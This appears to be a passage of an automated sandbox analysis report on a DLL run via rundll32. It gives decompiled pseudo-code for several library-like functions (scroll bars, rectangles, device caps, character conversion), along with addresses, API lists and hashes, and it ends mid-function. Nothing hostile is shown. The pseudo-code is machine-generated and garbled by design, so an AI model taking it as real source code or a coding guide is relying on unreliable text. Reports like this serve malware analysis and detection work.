                                                                                                        APIs
                                                                                                        • ShowScrollBar.USER32(?,00000000,00000000), ref: 10024896
                                                                                                        • ShowScrollBar.USER32(?,00000001,?), ref: 100248D1
                                                                                                        • MulDiv.KERNEL32(?,?,?), ref: 100249A0
                                                                                                        • MulDiv.KERNEL32(?,?,?), ref: 100249AD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ScrollShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3611344627-0
                                                                                                        • Opcode ID: 00816a393572913cefe3288e03d57a37a93b6603a9be590528033d7c6ac3ad81
                                                                                                        • Instruction ID: 25b7b55df25dcea5e1d15c7643b41a0851460ea700b4ba86336514dfadbdef25
                                                                                                        • Opcode Fuzzy Hash: 00816a393572913cefe3288e03d57a37a93b6603a9be590528033d7c6ac3ad81
                                                                                                        • Instruction Fuzzy Hash: C3414874600609AFCB18DF24D880AAABBF6FF48304F01455DF85A9B361DB71E951CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100382A4, Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E100382A4(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t60;
				signed short _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				void* _t80;
				void* _t84;
				intOrPtr _t85;

				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t85 = E10009228(__ecx, __ecx, _t80, _t84, __eflags);
				_v16 = _t85;
				_v8 = E10021768(_t76, _t80, _t85, __eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t85;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00005000;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00005000;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x74) & 0x0000f000) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E1002180B(_t76,  *((intOrPtr*)(_t76 + 0x84)), _t76 + 0xc, 0, _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}





















                                                                                                        0x100382b2
                                                                                                        0x100382b4
                                                                                                        0x100382b7
                                                                                                        0x100382c0
                                                                                                        0x100382c6
                                                                                                        0x100382c8
                                                                                                        0x100382d0
                                                                                                        0x100382d3
                                                                                                        0x100382d6
                                                                                                        0x100382e0
                                                                                                        0x100382e7
                                                                                                        0x100382eb
                                                                                                        0x100382ff
                                                                                                        0x10038305
                                                                                                        0x10038308
                                                                                                        0x1003830b
                                                                                                        0x1003830d
                                                                                                        0x10038315
                                                                                                        0x10038315
                                                                                                        0x10038319
                                                                                                        0x10038326
                                                                                                        0x1003831b
                                                                                                        0x1003831b
                                                                                                        0x1003831f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1003831f
                                                                                                        0x1003830f
                                                                                                        0x1003830f
                                                                                                        0x10038313
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10038313
                                                                                                        0x1003832c
                                                                                                        0x100382ed
                                                                                                        0x100382ed
                                                                                                        0x100382e2
                                                                                                        0x100382e2
                                                                                                        0x10038332
                                                                                                        0x10038333
                                                                                                        0x10038334
                                                                                                        0x10038335
                                                                                                        0x1003833b
                                                                                                        0x1003833d
                                                                                                        0x10038340
                                                                                                        0x10038340
                                                                                                        0x10038349
                                                                                                        0x10038353
                                                                                                        0x10038353
                                                                                                        0x10038359
                                                                                                        0x1003835c
                                                                                                        0x1003835f
                                                                                                        0x10038361
                                                                                                        0x10038361
                                                                                                        0x10038382
                                                                                                        0x10038390
                                                                                                        0x10038391
                                                                                                        0x10038397
                                                                                                        0x10038398
                                                                                                        0x100383a0
                                                                                                        0x100383a1
                                                                                                        0x100383a4
                                                                                                        0x100383a7
                                                                                                        0x100383ac

                                                                                                        APIs
                                                                                                        • GetStockObject.GDI32(00000000), ref: 100382BA
                                                                                                          • Part of subcall function 10009228: __EH_prolog3_catch.LIBCMT ref: 1002A4F5
                                                                                                          • Part of subcall function 10021768: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 100217AE
                                                                                                          • Part of subcall function 10021768: CreatePatternBrush.GDI32(00000000), ref: 100217BB
                                                                                                          • Part of subcall function 10021768: DeleteObject.GDI32(00000000), ref: 100217C7
                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 10038353
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateObject$BitmapBrushDeleteH_prolog3_catchInflatePatternRectStock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1003370953-0
                                                                                                        • Opcode ID: 6b2c497fe91fe830febcd821921ae1532e8a96b22c48c9d7ed3cbb1830d2267d
                                                                                                        • Instruction ID: ac26d0543685a7c70eec9d3d4ce543007955c662c1ab29e22c3078e3e903d26e
                                                                                                        • Opcode Fuzzy Hash: 6b2c497fe91fe830febcd821921ae1532e8a96b22c48c9d7ed3cbb1830d2267d
                                                                                                        • Instruction Fuzzy Hash: 6341FF71D00619AFDF42CFA8C980AAEBBF5EB08751F5106A5ED11BB285D370AF41CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1004C375, Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1004C375(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E1003ADA7( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10046C0E( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1003F256(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                        0x1004c37d
                                                                                                        0x1004c384
                                                                                                        0x1004c399
                                                                                                        0x00000000
                                                                                                        0x1004c38b
                                                                                                        0x1004c38d
                                                                                                        0x1004c3a5
                                                                                                        0x1004c3aa
                                                                                                        0x1004c3ad
                                                                                                        0x1004c3b0
                                                                                                        0x1004c3d9
                                                                                                        0x1004c3de
                                                                                                        0x1004c3e2
                                                                                                        0x1004c463
                                                                                                        0x1004c475
                                                                                                        0x1004c47e
                                                                                                        0x1004c480
                                                                                                        0x1004c3c0
                                                                                                        0x1004c3c0
                                                                                                        0x1004c3c3
                                                                                                        0x1004c3c5
                                                                                                        0x1004c3c8
                                                                                                        0x1004c3c8
                                                                                                        0x1004c3c8
                                                                                                        0x1004c3c8
                                                                                                        0x00000000
                                                                                                        0x1004c3ce
                                                                                                        0x1004c442
                                                                                                        0x1004c442
                                                                                                        0x1004c447
                                                                                                        0x1004c44d
                                                                                                        0x1004c450
                                                                                                        0x1004c452
                                                                                                        0x1004c455
                                                                                                        0x1004c455
                                                                                                        0x1004c455
                                                                                                        0x1004c455
                                                                                                        0x00000000
                                                                                                        0x1004c459
                                                                                                        0x1004c3e4
                                                                                                        0x1004c3e7
                                                                                                        0x1004c3e7
                                                                                                        0x1004c3ed
                                                                                                        0x1004c3f0
                                                                                                        0x1004c417
                                                                                                        0x1004c41a
                                                                                                        0x1004c41a
                                                                                                        0x1004c420
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c422
                                                                                                        0x1004c425
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c427
                                                                                                        0x1004c427
                                                                                                        0x1004c42a
                                                                                                        0x1004c42a
                                                                                                        0x1004c430
                                                                                                        0x1004c39e
                                                                                                        0x1004c39e
                                                                                                        0x1004c439
                                                                                                        0x00000000
                                                                                                        0x1004c439
                                                                                                        0x1004c3f2
                                                                                                        0x1004c3f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c3f9
                                                                                                        0x1004c407
                                                                                                        0x1004c40a
                                                                                                        0x1004c410
                                                                                                        0x1004c412
                                                                                                        0x1004c415
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1004c415
                                                                                                        0x1004c3b2
                                                                                                        0x1004c3b5
                                                                                                        0x1004c3b7
                                                                                                        0x1004c3bd
                                                                                                        0x1004c3bd
                                                                                                        0x00000000
                                                                                                        0x1004c38f
                                                                                                        0x1004c38f
                                                                                                        0x1004c394
                                                                                                        0x1004c396
                                                                                                        0x1004c396
                                                                                                        0x00000000
                                                                                                        0x1004c394
                                                                                                        0x1004c38d

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1004C3A5
                                                                                                        • __isleadbyte_l.LIBCMT ref: 1004C3D9
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,1004C829,?,?,00000002), ref: 1004C40A
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,1004C829,?,?,00000002), ref: 1004C478
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 1f136a960d333aa963d0ca33f97f86f0634b8fd6f56abe0f7d608e50e996c3e2
                                                                                                        • Instruction ID: e6e4f33cd182b2a5cd514dd675fb53e5d8f2e879cd69e61f2bb6d8a525780b16
                                                                                                        • Opcode Fuzzy Hash: 1f136a960d333aa963d0ca33f97f86f0634b8fd6f56abe0f7d608e50e996c3e2
                                                                                                        • Instruction Fuzzy Hash: B531C071A0028AEFDB90CFA4C894DBE3BE5EF01252F2585B9E464DB091D3709E40CB55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001F458, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 73%
                                                                                                        			E1001F458(intOrPtr* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, int _a8) {
				struct tagRECT* _v8;
				intOrPtr* _v12;
				void* _v28;
				void* __ebp;
				int _t41;
				intOrPtr _t47;
				intOrPtr _t62;
				intOrPtr* _t65;
				void* _t74;
				int _t76;
				void* _t79;
				intOrPtr* _t81;

				_t79 = __esi;
				_t74 = __edi;
				_t67 = __ecx;
				_t65 = __ebx;
				_t84 = __ecx;
				_v12 = __ecx;
				if(__ecx == 0) {
					L1:
					E1000836F(_t65, _t67, _t74, _t79, _t84);
				}
				_push(_t65);
				_t65 = _a4;
				_push(_t79);
				_push(_t74);
				if(_t65 == 0) {
					goto L1;
				}
				_t41 = _a8;
				_v8 = _t41 + 0x24;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_a4 =  *((intOrPtr*)(_t41 + 0x14));
				asm("movsd");
				 *((intOrPtr*)( *_t65 + 0x1c))();
				E10008722(_t65, 0, 0, 0, 0);
				_t81 = _v12;
				_t47 =  *((intOrPtr*)(_t81 + 0x74));
				_t76 = _a8;
				 *((intOrPtr*)(_t76 + 0x14)) = _t47;
				if(_t47 < _a4) {
					while(1) {
						 *((intOrPtr*)( *_t81 + 0x158))(_t65, _t76);
						_a8 = GetDeviceCaps( *(_t65 + 8), 0xa);
						SetRect(_v8, 0, 0, GetDeviceCaps( *(_t65 + 8), 8), _a8);
						DPtoLP( *(_t65 + 8), _v8, 2);
						 *((intOrPtr*)( *_t81 + 0x178))(_t65, _t76);
						_t62 =  *((intOrPtr*)(_t76 + 0x14));
						if(_t62 ==  *((intOrPtr*)(_t81 + 0x74))) {
							goto L6;
						}
						 *((intOrPtr*)(_t76 + 0x14)) = _t62 + 1;
						if( *((intOrPtr*)(_t76 + 0x14)) < _a4) {
							continue;
						}
						goto L6;
					}
				}
				L6:
				_a8 = 0 |  *((intOrPtr*)(_t76 + 0x14)) == _a4;
				 *((intOrPtr*)( *_t65 + 0x20))(0xffffffff);
				 *((intOrPtr*)(_t76 + 0x14)) = _a4;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return _a8;
			}















                                                                                                        0x1001f458
                                                                                                        0x1001f458
                                                                                                        0x1001f458
                                                                                                        0x1001f458
                                                                                                        0x1001f45e
                                                                                                        0x1001f460
                                                                                                        0x1001f463
                                                                                                        0x1001f465
                                                                                                        0x1001f465
                                                                                                        0x1001f465
                                                                                                        0x1001f46a
                                                                                                        0x1001f46b
                                                                                                        0x1001f470
                                                                                                        0x1001f471
                                                                                                        0x1001f472
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f474
                                                                                                        0x1001f47d
                                                                                                        0x1001f483
                                                                                                        0x1001f484
                                                                                                        0x1001f485
                                                                                                        0x1001f486
                                                                                                        0x1001f48d
                                                                                                        0x1001f48e
                                                                                                        0x1001f499
                                                                                                        0x1001f49e
                                                                                                        0x1001f4a1
                                                                                                        0x1001f4a7
                                                                                                        0x1001f4aa
                                                                                                        0x1001f4ad
                                                                                                        0x1001f4af
                                                                                                        0x1001f4b5
                                                                                                        0x1001f4cb
                                                                                                        0x1001f4df
                                                                                                        0x1001f4ed
                                                                                                        0x1001f4f9
                                                                                                        0x1001f4ff
                                                                                                        0x1001f505
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f508
                                                                                                        0x1001f511
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1001f511
                                                                                                        0x1001f4af
                                                                                                        0x1001f513
                                                                                                        0x1001f522
                                                                                                        0x1001f527
                                                                                                        0x1001f52d
                                                                                                        0x1001f539
                                                                                                        0x1001f53a
                                                                                                        0x1001f53b
                                                                                                        0x1001f53c
                                                                                                        0x1001f541

                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 1001F4C0
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 1001F4CE
                                                                                                        • SetRect.USER32 ref: 1001F4DF
                                                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 1001F4ED
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Exception@8H_prolog3RectThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 384053298-0
                                                                                                        • Opcode ID: 52f035f73c756c74fd7213ea2a16f9090fdcb56e219942f02a92e618c0205155
                                                                                                        • Instruction ID: 1e4b15356a76beedb3eb08749018a57921504bbb96488bad4b4a6fd09fa74d90
                                                                                                        • Opcode Fuzzy Hash: 52f035f73c756c74fd7213ea2a16f9090fdcb56e219942f02a92e618c0205155
                                                                                                        • Instruction Fuzzy Hash: 7B311975600A14AFDB01DF68C988AAABBF5FF49351F108168F949DB251D730EA81CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002A66D, Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002A66D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000AB4C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000AB19(_t51, _t65, 0, _t77) + 4));
					_t70 = E10029CA8(0x10097504);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10040181(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10039F30(_t51, _t66, _t70, _t83);
								}
								_t37 = E1003A230(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1003A230(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10040181(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E10028B71();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E1002A5A1(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                                                                                                        0x1002a66d
                                                                                                        0x1002a66d
                                                                                                        0x1002a677
                                                                                                        0x1002a679
                                                                                                        0x1002a680
                                                                                                        0x1002a758
                                                                                                        0x1002a763
                                                                                                        0x1002a763
                                                                                                        0x1002a686
                                                                                                        0x1002a689
                                                                                                        0x1002a68c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002a695
                                                                                                        0x1002a6d9
                                                                                                        0x1002a6d9
                                                                                                        0x1002a6df
                                                                                                        0x1002a6ec
                                                                                                        0x1002a6f0
                                                                                                        0x1002a757
                                                                                                        0x00000000
                                                                                                        0x1002a6f6
                                                                                                        0x1002a6f6
                                                                                                        0x1002a6f9
                                                                                                        0x1002a6fb
                                                                                                        0x1002a70c
                                                                                                        0x1002a713
                                                                                                        0x1002a715
                                                                                                        0x1002a718
                                                                                                        0x1002a71c
                                                                                                        0x1002a71e
                                                                                                        0x1002a720
                                                                                                        0x1002a721
                                                                                                        0x1002a726
                                                                                                        0x1002a729
                                                                                                        0x1002a72c
                                                                                                        0x1002a732
                                                                                                        0x1002a739
                                                                                                        0x1002a741
                                                                                                        0x1002a744
                                                                                                        0x1002a754
                                                                                                        0x1002a754
                                                                                                        0x1002a744
                                                                                                        0x00000000
                                                                                                        0x1002a713
                                                                                                        0x1002a6fd
                                                                                                        0x1002a70a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002a70a
                                                                                                        0x1002a6f0
                                                                                                        0x1002a69b
                                                                                                        0x1002a69d
                                                                                                        0x1002a6a4
                                                                                                        0x1002a6a6
                                                                                                        0x1002a6a9
                                                                                                        0x1002a6ab
                                                                                                        0x1002a6af
                                                                                                        0x1002a6af
                                                                                                        0x1002a6ab
                                                                                                        0x1002a6a4
                                                                                                        0x1002a6b4
                                                                                                        0x1002a6bc
                                                                                                        0x1002a6c4
                                                                                                        0x1002a6cc
                                                                                                        0x1002a6d4
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __msize_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1288803200-0
                                                                                                        • Opcode ID: af7caa76c6878da24c0974d9897d1e72ce0594f52bc9d54e21a1dc465a5897ea
                                                                                                        • Instruction ID: f7a44f1ba5387b2ca440894864c24ef8828f27413fd616c068b9ad83a3ac2100
                                                                                                        • Opcode Fuzzy Hash: af7caa76c6878da24c0974d9897d1e72ce0594f52bc9d54e21a1dc465a5897ea
                                                                                                        • Instruction Fuzzy Hash: D321A035A046109FCB55DF30EC8595A77E5EF423A0B918A29EC18CB186DF30ECD0CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002DBEF, Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E1002DBEF(intOrPtr* __ecx, void* __eflags, struct tagPOINT _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				signed int _t30;
				signed char _t34;
				signed int _t35;
				signed int _t41;
				void* _t56;
				signed int _t58;
				intOrPtr* _t61;

				_t61 = __ecx;
				_v8 =  *((intOrPtr*)( *__ecx + 0xc))();
				E1002DA71(__ecx,  &_v24);
				_push(_a8);
				_t30 = PtInRect( &_v24, _a4.x);
				if(_t30 != 0) {
					_t58 = 0;
					do {
						if((_v8 & 1 << _t58) == 0) {
							goto L5;
						}
						E1002DAC3(_t61, _t56, _t58,  &_v24);
						_push(_a8);
						if(PtInRect( &_v24, _a4.x) != 0) {
							_t35 = _t58;
							L13:
							return _t35;
						}
						L5:
						_t58 = _t58 + 1;
					} while (_t58 < 8);
					_t34 =  *(_t61 + 4);
					_v8 = _t34;
